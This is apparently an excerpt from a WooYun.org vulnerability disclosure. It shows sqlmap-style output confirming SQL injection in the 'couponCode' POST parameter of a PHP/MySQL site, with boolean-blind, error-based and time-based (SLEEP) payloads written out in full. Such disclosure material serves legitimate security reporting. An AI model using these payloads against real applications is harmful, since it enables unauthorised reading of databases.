WooYun.org

---
Parameter: couponCode (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: couponCode=123123' RLIKE (SELECT (CASE WHEN (1511=1511) THEN 123123 ELSE 0x28 END)) AND 'Zxam'='Zxam&checkcoupon=%E7%A1%AE%E5%AE%9A
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: couponCode=123123' OR (SELECT 6938 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(6938=6938,1))),0x716a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wdwV'='wdwV&checkcoupon=%E7%A1%AE%E5%AE%9A
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: couponCode=123123' OR SLEEP(5) AND 'EBcu'='EBcu&checkcoupon=%E7%A1%AE%E5%AE%9A
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0